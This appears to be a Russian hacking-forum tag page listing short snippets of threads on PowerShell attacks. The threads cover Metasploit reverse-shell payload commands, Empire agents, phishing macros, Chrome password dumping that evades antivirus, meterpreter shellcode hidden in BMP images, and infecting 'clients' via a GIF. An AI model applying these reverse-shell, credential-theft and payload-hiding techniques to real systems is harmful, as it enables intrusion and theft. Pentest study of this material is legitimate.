powershell attack

  1. V

    В Kali linux не создается сеанс Powershell через payload

    Вобщем проблемма следующая. Не приходит сессия powershell в Kali linux. sudo msfconsole use payload/cmd/windows/powershell_reverse_tcp set lhost set lport generate -f raw use exploit/multi/handler set payload cmd/windows/powershell_reverse_tcp set lhost set lport exploit -j Запускаю на...
  2. Sergiy1306

    Empire

    Здравствуйте) такая проблема) поставил на vware kali linux, установил empire. Хочу с виртуалки на основание систему Windows 10 осуществлять атаку. Возможно ли это? Хочу сделать макросы для фишинга
  3. b0d

    Подскажите вектор атаки по Windows 10

    Тренируюсь проводить пентесты, давно этим не занимался, но решил вспомнить былое. Сетка моей организации, и я сам хакаю себя. Получен доступ в сеть по вайфаю. Найдены машины. Интересует одна, без фильтрованных портов. Картина такая: PORT STATE SERVICE 135/tcp open msrpc 139/tcp open...
  4. V

    Kali Linux Powershell Empire не видит агентов

    Проблема в том,что я,на виртуальной машине с установленным Kali Linux'ом,на программе Powershell Empire пытался подключится к себе при помощи этой же программы,перепробовал все,но ничего не получается.Win 10,Powershell Empire 2.5,Kali linux 2.6
  5. Ondrik8

    Конкурс Злая GIF-ка или веселое заражение "клиентуры"

    Всем привет, решил описать как мне кажется веселый метод заражения наших с вами "любимых клиентов" Все будет как Мы любим, весело, легко и без палевно) Тема была предназначена для Грей-секции но она по каким то причинам упорно не хотела туда ложится по этому и было принято решение выложить сюда...
  6. O

    Dump Chrome Passwords

    Всем привет! Думаю каждый сталкивался с такой проблемой, когда нужно взять пассы, но тот же метерпретер по каким-то причинам не справляется с этой задачей. Обычные стилаки типа LaZagne убиваются антивирусами, на приватные стиллеры нет денег, либо есть деньги, но нет надежных людей. При...
  7. I

    Статья Внедряем шелл-код meterpreter в картинку BMP

    Всем привет, сегодня расскажу как внедрить в картинку в формате bmp шелл-код для meterpreter. Для этой цели будем использовать утилиту под названием Don't Kill My Cat (DKMC). Краткий алгоритм: 1. Создается полезная нагрузка с meterpreter в формате RAW 2. С помощью DKMS полезная нагрузка...
  8. <~DarkNode~>

    Статья PowerShell для хакера (часть IV) [Web Delivery] - доставка полезной нагрузки через Web

    Часть 4 Предыдущая часть Следующая часть Все части Сегодня подготовительная статья на тему возможности PowerShell с точки зрение ИБ, на которою я еще буду ссылаться в дальнейших постах. Речь пойдет сегодня от технике Web Delivery - Доставка Полезной нагрузки через Web. Как вы заметили , я...
  9. <~DarkNode~>

    Статья PowerShell для хакера (часть III) [LuckyStrike - создание вредоносных макросов]

    Часть 3 Предыдущая часть Следующая часть Все части Привет колеги) Сегодня продолжим обогащать себя возможностями PowerShell с точки зрение информационной безопасности,вооружившись знаниями из моей прошлой статьи , мы познакомимся с таким проектом как LuckyStrike , и научимся с его помощью...
  10. <~DarkNode~>

    Скрытый BIND SHELL на PowerShell

    Привет колеги. Это будет коротенький пост из серии MustKnow(Нужно Знать). Как бы ничего нового но я посчитал нужным кинуть в копилку форума описания этого метода. Ничего нового мы изобретать с вами не будем,а воспользуемся обычной генерацией полезной нагрузки средствами msfvenom,и я лишь немного...
  11. <~DarkNode~>

    Статья Powershell для хакера (часть II )

    Часть 2 Предыдущая часть Следующая часть Все части Приветствую вас колеги) В прошлой статье мы научились использовать скрипты от PowerSploit для получение метерпретер сессии. Но вынудить жертву открыть командную строку и вставить всю строку для PowerShell как вы поняли не очень легко,правда...
  12. <~DarkNode~>

    PowerShell для хакера (часть I )

    Часть 1 Следующая часть Все части Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних. И начнем мы пожалуй сегодня с использования скриптов PowerSploit -( скрипты написанные на PowerShell для пост...
  13. <~DarkNode~>

    Статья Знакомство с PowerShell Empire Framework

    И так привет колеги. Сегодня я хотел бы немного Вас ознакомить с прекрасным ,по моему скромному мнению, продуктом PowerShell Empire Framework. PowerShell Empire Framework - это агент для пост эксплуатации windows систем,написанный полностью на павершеле (серверная часть на питона а клиентская...
  14. <~DarkNode~>

    Статья Быстрый способ получить meterpreter

    Привет колеги. ) Сегодня речь пойдет непосредственно о пост эксплуатации скомпрометированной системы (когда у нас есть командная строка удаленной windows машины от windows 7) и нам нужно расширить функционал своих возможностей с помощью метерпретер сессии метаслоита. Для этого нам отлично...